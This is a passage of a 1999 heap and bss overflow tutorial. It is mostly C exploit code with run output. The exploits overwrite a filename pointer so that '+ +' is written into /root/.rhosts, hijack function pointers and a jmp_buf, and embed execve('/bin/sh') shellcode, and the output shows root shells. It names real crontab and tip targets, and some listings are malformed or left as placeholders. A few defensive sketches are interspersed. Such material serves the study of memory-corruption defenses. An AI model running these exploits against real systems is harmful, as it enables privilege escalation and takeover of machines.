#define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

int main()
{
    u_long diff;
    char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

    diff = (u_long)buf2 - (u_long)buf1;
    printf("buf1 = %p, buf2 = %p, diff = 0x%lx bytes\n",
           (void *)buf1, (void *)buf2, diff);

    memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0';
    printf("before overflow: buf2 = %s\n", buf2);

    /* deliberately write past the end of buf1 and into buf2 */
    memset(buf1, 'B', (u_int)(diff + OVERSIZE));
    printf("after overflow: buf2 = %s\n", buf2);

    return 0;
}

If we run this, we'll get the following:

[root /w00w00/heap/examples/basic]# ./heap1 8
buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA

This works because buf1 overruns its boundaries into buf2's heap space.
But, because buf2's heap space is still valid (heap) memory, the program
doesn't crash.

Note:
A possible fix for a heap-based overflow, which will be mentioned
later, is to put "canary" values between all variables on the heap
space (like that of StackGuard mentioned later) that mustn't be changed
throughout execution.
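To make the canary idea concrete, here is a rough sketch of a guarded allocation. It is our own illustration, not the design of any existing tool: the names guarded_alloc() and guarded_check() are hypothetical, and a fixed, publicly known canary value like the one below could simply be rewritten by an attacker, so it only catches accidental overruns.

```c
#include <stdlib.h>
#include <string.h>

#define CANARY_VALUE 0xDEADC0DEu   /* arbitrary illustrative constant */

/* Hypothetical helper: allocate size usable bytes followed by a canary word. */
void *guarded_alloc(size_t size)
{
    unsigned int canary = CANARY_VALUE;
    unsigned char *p;

    if (size > (size_t)-1 - sizeof(canary))
        return NULL;                            /* size + canary would wrap */
    p = malloc(size + sizeof(canary));
    if (p == NULL)
        return NULL;
    memcpy(p + size, &canary, sizeof(canary));  /* canary sits right after the buffer */
    return p;
}

/* Returns 1 if the canary after the size-byte buffer is intact, 0 otherwise. */
int guarded_check(const void *buf, size_t size)
{
    unsigned int canary;

    memcpy(&canary, (const unsigned char *)buf + size, sizeof(canary));
    return canary == CANARY_VALUE;
}
```

A program would call guarded_check() at points where corruption matters, for example before using or freeing the buffer, and abort if it returns 0.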

You can get the complete source to all examples used in this article
from the file attachment, heaptut.tgz. You can also download this from
our article archive at http://www.w00w00.org/articles.html.

Note:
To demonstrate a bss-based overflow, change the line
'char *buf = malloc(BUFSIZE)' to 'static char buf[BUFSIZE]'.

Yes, that was a very basic example, but we wanted to demonstrate a heap
overflow at its most primitive level. This is the basis of almost
all heap-based overflows. We can use it to overwrite a filename, a
password, a saved uid, etc. Here is a (still primitive) example of
manipulating pointers:
/* demonstrates static pointer overflow in bss (uninitialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h> /* u_long, u_int */

#define BUFSIZE 16
#define ADDRLEN 4 /* # of bytes in an address */

int main()
{
    u_long diff;
    static char buf[BUFSIZE], *bufptr;

    bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

    printf("bufptr (%p) = %p, buf = %p, diff = 0x%lx (%lu) bytes\n",
           (void *)&bufptr, (void *)bufptr, (void *)buf, diff, diff);

    /* deliberately write past buf and over the adjacent pointer */
    memset(buf, 'A', (u_int)(diff + ADDRLEN));

    printf("bufptr (%p) = %p, buf = %p, diff = 0x%lx (%lu) bytes\n",
           (void *)&bufptr, (void *)bufptr, (void *)buf, diff, diff);

    return 0;
}

The results:

[root /w00w00/heap/examples/basic]# ./heap3
bufptr (0x804a860) = 0x804a850, buf = 0x804a850, diff = 0x10 (16) bytes
bufptr (0x804a860) = 0x41414141, buf = 0x804a850, diff = 0x10 (16) bytes

When run, one clearly sees that the pointer now points to a different
address. Uses of this? One example is that we could overwrite a
temporary filename pointer to point to a separate string (such as
argv[1], which we could supply ourselves), which could contain
"/root/.rhosts". Hopefully, you are starting to see some potential uses.

To demonstrate this, we will use a temporary file to momentarily save
some input from the user. This is our finished "vulnerable program":
/*
 * This is a typical vulnerable program. It will store user input in a
 * temporary file.
 *
 * Compile as: gcc -o vulprog1 vulprog1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

/*
 * Run this vulprog as root or change the "vulfile" to something else.
 * Otherwise, even if the exploit works, it won't have permission to
 * overwrite /root/.rhosts (the default "example").
 */

int main(int argc, char **argv)
{
    FILE *tmpfd;
    static char buf[BUFSIZE], *tmpfile;

    if (argc <= 1)
    {
        fprintf(stderr, "Usage: %s \n", argv[0]);
        exit(ERROR);
    }

    tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */
    printf("before: tmpfile = %s\n", tmpfile);

    printf("Enter one line of data to put in %s: ", tmpfile);
    gets(buf);

    printf("\nafter: tmpfile = %s\n", tmpfile);

    tmpfd = fopen(tmpfile, "w");
    if (tmpfd == NULL)
    {
        fprintf(stderr, "error opening %s: %s\n", tmpfile,
                strerror(errno));
        exit(ERROR);
    }

    fputs(buf, tmpfd);
    fclose(tmpfd);
}

The aim of this "example" program is to demonstrate that something of
this nature can easily occur in programs (although hopefully not setuid
or root-owned daemon servers).
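The root cause in the vulnerable program is the unbounded gets() into a buffer that sits next to a pointer. A sketch of the bounded alternative follows. The struct is only a model we invented to make the "buffer followed by pointer" layout explicit; the real program uses two separate static variables, and read_input_bounded() is a hypothetical name.

```c
#include <stdio.h>
#include <string.h>

#define BUFSIZE 16

/* Hypothetical model of the static data: a buffer followed by a pointer. */
struct vul_state {
    char buf[BUFSIZE];
    const char *tmpfile_name;
};

/* Reads one line into st->buf with fgets(), which never writes more than
   sizeof(st->buf) bytes, so tmpfile_name cannot be overwritten.
   Returns 0 on success, -1 on end-of-file or error. */
int read_input_bounded(struct vul_state *st, FILE *in)
{
    if (fgets(st->buf, sizeof(st->buf), in) == NULL)
        return -1;
    st->buf[strcspn(st->buf, "\n")] = '\0';   /* drop the newline, if any */
    return 0;
}
```

However long the input line is, at most BUFSIZE - 1 characters are stored and the filename pointer keeps its original value.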

And here is our exploit for the vulnerable program:

/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* This will exploit vulprog1.c. It passes some arguments to the
* program (that the vulnerable program doesn't use). The vulnerable
* program expects us to enter one line of input to be stored
* temporarily. However, because of a static buffer overflow, we can
* overwrite the temporary filename pointer, to have it point to
* argv[1] (which we could pass as "/root/.rhosts"). Then it will
* write our temporary line to this file. So our overflow string (what
* we pass as our input line) will be:
* + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address
*
* We use "+ +" (all hosts), followed by '#' (comment indicator), to
* prevent our "attack code" from causing problems. Without the
* "#", programs using .rhosts would misinterpret our attack code.
*
* Compile as: gcc -o exploit1 exploit1.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFSIZE 256

#define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */

#define VULPROG "./vulprog1"


#define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */

/* get value of sp off the stack (used to calculate argv[1] address) */
u_long getesp()
{
__asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv)

{
u_long addr;

register int i;
int mainbufsize;

char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

/* ------------------------------------------------------ */
if (argc <= 1)
{
fprintf(stderr, "Usage: %s [try 310-330]\n", argv[0]);
exit(ERROR);
}
/* ------------------------------------------------------ */

memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# ");

memset(buf + strlen(buf), 'A', DIFF);


addr = getesp() + atoi(argv[1]);

/* reverse byte order (on a little endian system) */


for (i = 0; i < sizeof(u_long); i++)
buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;

mainbuf = (char *)malloc(mainbufsize);
memset(mainbuf, 0, sizeof(mainbufsize));

snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
buf, VULPROG, VULFILE);

printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
addr, VULFILE);

system(mainbuf);
return 0;
}

Here's what happens when we run it:


[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320
Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts
after.

before: tmpfile = /tmp/vulprog.tmp


Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /vulprog1

Well, we can see that's part of argv[0] ("./vulprog1"), so we know we
are close:
[root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330
Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts
after.

before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /root/.rhosts
[root /tmp/heap/examples/advanced/vul-pkg1]#

Got it! The exploit overwrites the buffer that the vulnerable program
uses for gets() input. At the end of its buffer, it places the address
of where we assume argv[1] of the vulnerable program is. That is, we
overwrite everything between the overflowed buffer and the tmpfile
pointer. We ascertained the tmpfile pointer's location in memory by
sending arbitrary lengths of "A"'s until we discovered how many "A"'s
it took to reach the start of tmpfile's address. If you have the
source to the vulnerable program, you can also add a "printf()" to
print out the addresses/offsets between the overflowed data and the
target data
(i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').

(Un)fortunately, the offsets usually change at compile-time (as far as
I know), but we can easily recalculate, guess, or "brute force" the
offsets.

Note:
Now that we need a valid address (argv[1]'s address), we must reverse
the byte order for little endian systems. Little endian systems store
the least significant byte first (x86 is little endian), so
0x12345678 is laid out in memory as the bytes 78 56 34 12. On a big
endian system (such as a sparc), we could drop the code that reverses
the byte order and leave the addresses alone.
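
The byte layout described in this note can be checked with a small
sketch. The helper names store_le32() and host_is_little_endian() are
made up for illustration; the first writes a 32-bit value least
significant byte first, using the same shift-and-mask loop the listings
in this article use, and the second reports how the host itself stores
integers.

```c
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value least significant byte first (little endian). */
void store_le32(unsigned char out[4], uint32_t value)
{
    int i;

    for (i = 0; i < 4; i++)
        out[i] = (unsigned char)((value >> (i * 8)) & 0xff);
}

/* Returns 1 if the host stores integers little endian, 0 otherwise. */
int host_is_little_endian(void)
{
    uint32_t probe = 1;
    unsigned char first;

    memcpy(&first, &probe, 1);      /* look at the lowest-addressed byte */
    return first == 1;
}
```

Calling store_le32(bytes, 0x12345678) fills bytes with 78 56 34 12 on
any host; on a little endian host that is also what the integer looks
like in memory.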

Further note:
So far none of these examples required an executable heap! As I
briefly mentioned in the "Why Heap/BSS Overflows are Significant"
section, these previous examples (with the exception of the address
byte order) were all system/architecture independent. This is useful
in exploiting heap-based overflows.

With knowledge of how to overwrite pointers, we're going to show how
to modify function pointers. The downside to exploiting function
pointers (and the others to follow) is that they require an executable
heap.

A function pointer (i.e., "int (*funcptr)(char *str)") allows a
programmer to dynamically modify a function to be called. We can
overwrite a function pointer by overwriting its address, so that when
it's executed, it calls the function we point it to instead. This is
good news because there are several options we have. First, we
can include our own shellcode. We can do one of the following with
shellcode:

1. argv[] method: store the shellcode in an argument to the program
(requiring an executable stack)

2. heap offset method: offset from the top of the heap to the
estimated address of the target/overflow buffer (requiring an
executable heap)

Note: There is a greater probability of the heap being executable than
the stack on any given system. Therefore, the heap method will
probably work more often.

A second method is to simply guess (though it's inefficient) the
address of a function, using an estimated offset of that in the
vulnerable program. Also, if we know the address of system() in our
program, it will be at a very close offset, assuming both
vulprog/exploit were compiled the same way. The advantage is that no
executable stack or heap is required.

Note:
Another method is to use the PLT (Procedure Linkage Table) which
shares the address of a function in the PLT. I first learned the PLT
method from str (stranJer) in a non-executable stack exploit for
sparc.

The reason the second method is the preferred method is simplicity.
We can guess the offset of system() in the vulprog from the address of
system() in our exploit fairly quickly. The same holds on remote
systems (assuming similar versions, operating systems, and
architectures). With the stack method, the advantage is that we can do
whatever we want, and we don't require compatible function pointers
(i.e., char (*funcptr)(int a) and void (*funcptr)() would work the
same). The disadvantage (as mentioned earlier) is that it requires an
executable stack.

Here is our vulnerable program for the following 2 exploits:
-----------------------------------------------------------------------------
/*
 * Just the vulnerable program we will exploit.
 * Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 64

int goodfunc(const char *str); /* funcptr starts out as this */

int main(int argc, char **argv)
{
static char buf[BUFSIZE];
static int (*funcptr)(const char *str);

if (argc <= 2)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}

printf("(for 1st exploit) system() = %p\n", system);
printf("(for 2nd exploit, stack method) argv[2] = %p\n",
argv[2]);
printf("(for 2nd exploit, heap offset method) buf = %p\n\n",
buf);

funcptr = (int (*)(const char *str))goodfunc;
printf("before overflow: funcptr points to %p\n", funcptr);

memset(buf, 0, sizeof(buf));
strncpy(buf, argv[1], strlen(argv[1]));
printf("after overflow: funcptr points to %p\n", funcptr);

(void)(*funcptr)(argv[2]);
return 0;
}

/* ---------------------------------------------- */

/* This is what funcptr would point to if we didn't overflow it */
int goodfunc(const char *str)
{
printf("\nHi, I'm a good function. I was passed: %s\n", str);
return 0;
}
-----------------------------------------------------------------------------

Our first example is the system() method:
-----------------------------------------------------------------------------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates overflowing/manipulating static function pointers in
* the bss (uninitialized data) to execute functions.
*
* Try in the offset (argv[2]) in the range of 0-20 (10-16 is best)
* To compile use: gcc -o exploit1 exploit1.c
*/

#include
#include
#include
#include

#define BUFSIZE 64 /* the estimated diff between funcptr/buf */

#define VULPROG "./vulprog" /* vulnerable program location */


#define CMD "/bin/sh" /* command to execute if successful */

#define ERROR -1

int main(int argc, char **argv)


{
register int i;
u_long sysaddr;
static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
fprintf(stderr, "[offset = estimated system() offset]\n\n");

exit(ERROR);
}

sysaddr = (u_long)&system - atoi(argv[1]);


printf("trying system() at 0x%lx\n", sysaddr);

memset(buf, 'A', BUFSIZE);

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

execl(VULPROG, VULPROG, buf, CMD, NULL);


return 0;
}
----------------------------------------------------------------------
-------

When we run this with an offset of 16 (which may vary) we get:


[root /w00w00/heap/examples]# ./exploit1 16
trying system() at 0x80484d0
(for 1st exploit) system() = 0x80484d0
(for 2nd exploit, stack method) argv[2] = 0xbffffd3c
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770


after overflow: funcptr points to 0x80484d0
bash#

And our second example, using both argv[] and heap offset method:
----------------------------------------------------------------------
-------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * This demonstrates how to exploit a static buffer to point the
 * function pointer at argv[] to execute shellcode. This requires
 * an executable heap to succeed.
 *
 * The exploit takes two arguments (the offset and "heap"/"stack").
 * For argv[] method, it's an estimated offset to argv[2] from
 * the stack top. For the heap offset method, it's an estimated
 * offset to the target/overflow buffer from the heap top.
 *
 * Try values somewhere between 325-345 for argv[] method, and
 * 420-450 for heap.
 *
 * To compile use: gcc -o exploit2 exploit2.c
 */

#include
#include
#include
#include

#define ERROR -1
#define BUFSIZE 64 /* estimated diff between buf/funcptr */

#define VULPROG "./vulprog" /* where the vulprog is */

char shellcode[] = /* just aleph1's old shellcode (linux x86) */


"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
__asm__("movl %esp,%eax"); /* set sp as return value */
}

int main(int argc, char **argv)


{
register int i;
u_long sysaddr;
char buf[BUFSIZE + sizeof(u_long) + 1];

if (argc <= 2)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}

if (strncmp(argv[2], "stack", 5) == 0)
{
printf("Using stack for shellcode (requires exec. stack)\n");

sysaddr = getesp() + atoi(argv[1]);


printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);

memset(buf, 'A', BUFSIZE + sizeof(u_long));


}

else
{
printf("Using heap buffer for shellcode "
"(requires exec. heap)\n");

sysaddr = (u_long)sbrk(0) - atoi(argv[1]);


printf("Using 0x%lx as our buffer's address\n\n", sysaddr);

if (BUFSIZE + 4 + 1 < strlen(shellcode))


{
fprintf(stderr, "error: buffer is too small for shellcode "
"(min. = %d bytes)\n", strlen(shellcode));

exit(ERROR);
}

strcpy(buf, shellcode);
memset(buf + strlen(shellcode), 'A',
BUFSIZE - strlen(shellcode) + sizeof(u_long));
}

buf[BUFSIZE + sizeof(u_long)] = '\0';

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(sysaddr); i++)
buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

execl(VULPROG, VULPROG, buf, shellcode, NULL);


return 0;
}
----------------------------------------------------------------------
-------

When we run this with an offset of 334 for the argv[] method we get:
[root /w00w00/heap/examples] ./exploit2 334 stack
Using stack for shellcode (requires exec. stack)
Using 0xbffffd16 as our argv[1] address

(for 1st exploit) system() = 0x80484d0


(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770


after overflow: funcptr points to 0xbffffd16
bash#

When we run this with an offset of 428-442 for the heap offset method
we get:
[root /w00w00/heap/examples] ./exploit2 428 heap
Using heap buffer for shellcode (requires exec. heap)
Using 0x804a9a8 as our buffer's address

(for 1st exploit) system() = 0x80484d0


(for 2nd exploit, stack method) argv[2] = 0xbffffd16
(for 2nd exploit, heap offset method) buf = 0x804a9a8

before overflow: funcptr points to 0x8048770
after overflow: funcptr points to 0x804a9a8
bash#

Note:
Another advantage to the heap method is that you have a large
working range. With argv[] (stack) method, it needed to be exact.
With the heap offset method, any offset between 428-442 worked.

As you can see, there are several different methods to exploit the
same problem. As an added bonus, we'll include a final type of
exploitation that uses jmp_bufs (setjmp/longjmp). jmp_bufs basically
store a stack frame, and jump to it at a later point in execution. If
we get a chance to overflow a buffer between setjmp() and longjmp(),
and the jmp_buf is above the overflowed buffer, this can be exploited.
We can set these up to emulate the behavior of a stack-based overflow
(as does the argv[] shellcode method used earlier, also). Now this is
the jmp_buf for an x86 system. These will need to be modified for
other architectures, accordingly.

First we will include a vulnerable program again:


----------------------------------------------------------------------
-------
/*
* This is just a basic vulnerable program to demonstrate
* how to overwrite/modify jmp_buf's to modify the course of
* execution.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <setjmp.h>

#define ERROR -1
#define BUFSIZE 16

static char buf[BUFSIZE];


jmp_buf jmpbuf;

u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)


{
if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n", argv[0]);
exit(ERROR);
}

printf("[vulprog] argv[2] = %p\n", argv[2]);


printf("[vulprog] sp = 0x%lx\n\n", getesp());

if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */


{
fprintf(stderr, "error: exploit didn't work\n");
exit(ERROR);
}

printf("before:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

printf("bp = %p, sp = %p, pc = %p\n\n",


jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */

printf("after:\n");
printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di);

printf("bp = %p, sp = %p, pc = %p\n\n",


jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc);

longjmp(jmpbuf, 1);
return 0;
}
----------------------------------------------------------------------
-------

The reason we have the vulnerable program output its stack pointer
(esp on x86) is that it makes "guessing" easier for the novice.

And now the exploit for it (you should be able to follow it):
----------------------------------------------------------------------
-------
/*
* Copyright (C) January 1999, Matt Conover & WSD
*
* Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp)
* to emulate a stack-based overflow in the heap. By that I mean,
* you would overflow the sp/pc of the jmpbuf. When longjmp() is
* called, it will execute the next instruction at that address.
* Therefore, we can stick shellcode at this address (as the
* data/heap section on most systems is executable), and it will be
* executed.
*
* This takes two arguments (offsets):
* arg 1 - stack offset (should be about 25-45).
* arg 2 - argv offset (should be about 310-330).
*/

#include
#include
#include
#include

#define ERROR -1
#define BUFSIZE 16

#define VULPROG "./vulprog4"

char shellcode[] = /* just aleph1's old shellcode (linux x86) */


"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
"\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
__asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)


{
int stackaddr, argvaddr;
register int index, i, j;

char buf[BUFSIZE + 24 + 1];

if (argc <= 1)
{
fprintf(stderr, "Usage: %s \n",
argv[0]);

fprintf(stderr, "[stack offset = offset to stack of


vulprog\n");
fprintf(stderr, "[argv offset = offset to argv[2]]\n");

exit(ERROR);
}

stackaddr = getesp() - atoi(argv[1]);


argvaddr = getesp() + atoi(argv[2]);

printf("trying address 0x%lx for argv[2]\n", argvaddr);


printf("trying address 0x%lx for sp\n\n", stackaddr);

/*
* The second memset() is needed, because otherwise some values
* will be (null) and the longjmp() won't do our shellcode.
*/

memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12);


buf[BUFSIZE+24] = '\0';

/* ------------------------------------- */

/*
* We need the stack pointer, because to set pc to our shellcode

* address, we have to overwrite the stack pointer for jmpbuf.
* Therefore, we'll rewrite it with the real address again.
*/

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(u_long); i++) /* setup BP */
{
index = BUFSIZE + 16 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}

/* ----------------------------- */

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(u_long); i++) /* setup SP */
{
index = BUFSIZE + 20 + i;
buf[index] = (stackaddr >> (i * 8)) & 255;
}

/* ----------------------------- */

/* reverse byte order (on a little endian system) (ntohl equiv)


*/
for (i = 0; i < sizeof(u_long); i++) /* setup PC */
{
index = BUFSIZE + 24 + i;
buf[index] = (argvaddr >> (i * 8)) & 255;
}

execl(VULPROG, VULPROG, buf, shellcode, NULL);


return 0;
}
----------------------------------------------------------------------
-------

Ouch, that was sloppy. But anyway, when we run this with a stack
offset of 36 and an argv[2] offset of 322, we get the following:
[root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
trying address 0xbffffcf6 for argv[2]
trying address 0xbffffb90 for sp

[vulprog] argv[2] = 0xbffffcf6


[vulprog] sp = 0xbffffb90

before:
bx = 0x0, si = 0x40001fb0, di = 0x4000000f
bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715

after:
bx = 0x1010101, si = 0x1010101, di = 0x1010101
bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6

bash#

w00w00! For those of you that are saying, "Okay. I see this works in a
controlled environment; but what about in the wild?" There is
sensitive data on the heap that can be overflowed. Examples include:

    functions                          reason
    1. *gets()/*printf(), *scanf()     __iob (FILE) structure in heap
    2. popen()                         __iob (FILE) structure in heap
    3. *dir() (readdir, seekdir, ...)  DIR entries (dir/heap buffers)
    4. atexit()                        static/global function pointers
    5. strdup()                        allocates dynamic data in the heap
    7. getenv()                        stored data on heap
    8. tmpnam()                        stored data on heap
    9. malloc()                        chain pointers
    10. rpc callback functions         function pointers
    11. windows callback functions     func pointers kept on heap
    12. signal handler pointers        function pointers (note: unix tracks
        in cygnus (gcc for win)        these in the kernel, not in the heap)

Now, you can definitely see some uses for these functions. Room
allocated for FILE structures in functions such as printf()'s,
fgets()'s, readdir()'s, seekdir()'s, etc. can be manipulated (buffer
or function pointers). atexit() has function pointers that will be
called when the program terminates. strdup() can store strings (such
as filenames or passwords) on the heap. malloc()'s own chain pointers
(inside its pool) can be manipulated to access memory it wasn't meant
to access. getenv() stores data on the heap, which would allow us to
modify something such as $HOME after it's initially checked. svc/rpc
registration functions (librpc, libnsl, etc.) keep callback functions
stored on the heap.

We will demonstrate overwriting Windows callback functions and
overwriting FILE (__iob) structures (with popen).

Once you know how to overwrite FILE structures with popen(), you can
quickly figure out how to do it with other functions (i.e., *printf,
*gets, *scanf, etc.), as well as DIR structures (because they are
similar).

Now for some case studies! Our two "real world" vulnerabilities will
be Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability
was discovered by mudge of L0pht (see L0pht 1996 Advisory Page).
We're reusing it because it's a textbook example of a heap-based
overflow (though we will use our own method of exploitation).

Our first case study will be the BSDI crontab heap-based overflow. We
can pass a long filename, which will overflow a static buffer. Above
that buffer in memory, we have a pwd (see pwd.h) structure! This
stores a user's user name, password, uid, gid, etc. By overwriting the
uid/gid field of the pwd, we can modify the privileges that crond will
run our crontab with (as soon as it tries to run our crontab). This
script could then put out a suid root shell, because our script will
be running with uid/gid 0.

Here is our exploit code:


----------------------------------------------------------------------
-------
----------------------------------------------------------------------
-------

When we run it on a BSDI X.X machine, we get the following:


[Put exploit output here]

'tip' is run suid uucp on Solaris. It is possible to get root once
uucp privileges are gained (but, that's outside the scope of this
article). Tip will overflow a static buffer when prompting for a file
to send/receive. Above the static buffer in memory is a jmp_buf. By
overwriting the static buffer and then causing a SIGINT, we can get
shellcode executed (by storing it in argv[]). To exploit successfully,
we need to either connect to a valid system, or create a "fake device"
to which tip will connect.

Here is our tip exploit:


----------------------------------------------------------------------
-------
----------------------------------------------------------------------
-------

When we run it on a Solaris 2.7 machine, we get the following:


[Put exploit output here]

Possible Fixes (Workarounds)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Obviously, the best prevention for heap-based overflows is writing
good code! Similar to stack-based overflows, there is no real way of
preventing heap-based overflows.
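
As one concrete instance of "good code": the vulnerable programs above
call strncpy(buf, argv[1], strlen(argv[1])), which bounds the copy by
the length of the source and therefore protects nothing. Below is a
minimal sketch of a copy bounded by the destination instead.
copy_bounded() is a hypothetical helper written for this illustration,
not something from the original programs.

```c
#include <string.h>

/*
 * Copy src into dst without ever writing more than dstsize bytes.
 * dst is always NUL-terminated when dstsize > 0.
 * Returns 0 if the whole string fit, -1 if it was truncated or an
 * argument was invalid.
 */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;

    len = strlen(src);
    if (len >= dstsize) {
        memcpy(dst, src, dstsize - 1);  /* keep only what fits */
        dst[dstsize - 1] = '\0';
        return -1;
    }

    memcpy(dst, src, len + 1);          /* includes the terminating NUL */
    return 0;
}
```

A caller would pass sizeof(buf) as dstsize and treat -1 as an error, so
nothing beyond buf (such as funcptr or jmpbuf) is touched regardless of
how long the input is.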

We can get a copy of the bounds checking gcc/egcs (which should locate
most potential heap-based overflows) developed by Richard Jones and
Paul Kelly. This program can be downloaded from Richard Jones's
homepage at http://www.annexia.demon.co.uk. It detects overruns that
might be missed by human error. One example they use is: "int
array[10]; for (i = 0; i <= 10; i++) array[i] = 1". I have never used
it.
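
The quoted loop writes array[10], one element past the end of a
10-element array. A sketch of the corrected form follows; fill_ones()
is an illustrative name, and the caller is assumed to pass the real
element count.

```c
#include <stddef.h>

/*
 * Set the first 'count' elements of array to 1.
 * Valid indices are 0 .. count-1, so the loop condition is '<', not '<='.
 * Returns the number of elements written.
 */
size_t fill_ones(int *array, size_t count)
{
    size_t i;

    for (i = 0; i < count; i++)
        array[i] = 1;
    return i;
}
```

For "int array[10]" the call would be
fill_ones(array, sizeof(array) / sizeof(array[0])), which keeps the
count tied to the declaration.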

Note:
For Windows, one could use NuMega's bounds checker which essentially
performs the same as the bounds checking gcc.

We can always make a non-executable heap patch (as mentioned earlier,
most systems have an executable heap). During a conversation I had
with Solar Designer, he mentioned the main problems with a
non-executable heap would involve compilers, interpreters, etc.

Note:
I added a note section here to reiterate the point that a
non-executable heap does NOT prevent heap overflows at all. It means
we can't execute instructions in the heap. It does NOT prevent us from
overwriting data in the heap.

Likewise, another possibility is to make a "HeapGuard", which would be
the equivalent to Cowan's StackGuard mentioned earlier. He (et al.)
also developed something called "MemGuard", but it's a misnomer.
Its function is to prevent a return address (on the stack) from being
overwritten (via canary values). It does nothing to prevent
overflows in the heap or bss.
Acknowledgements
~~~~~~~~~~~~~~~~
There has been a significant amount of work on heap-based overflows in
the past. We ought to name some other people who have published work
involving heap/bss-based overflows (though, our work wasn't based off
them).

Solar Designer: SuperProbe exploit (function pointers), color_xterm
exploit (struct pointers), WebSite (pointer arrays), etc.

L0pht: Internet Explorer 4.01 vulnerability (dildog), BSDI crontab
exploit (mudge), etc.

Some others who have published exploits for heap-based overflows
(thanks to stranJer for pointing them out) are Joe Zbiciak (solaris
ps) and Adam Morrison (stdioflow). I'm sure there are many others, and
I apologize for excluding anyone.

I'd also like to thank the following people who had some direct
involvement in this article: str (stranJer), halflife, and jobe.
Indirect involvements: Solar Designer, mudge, and other w00w00
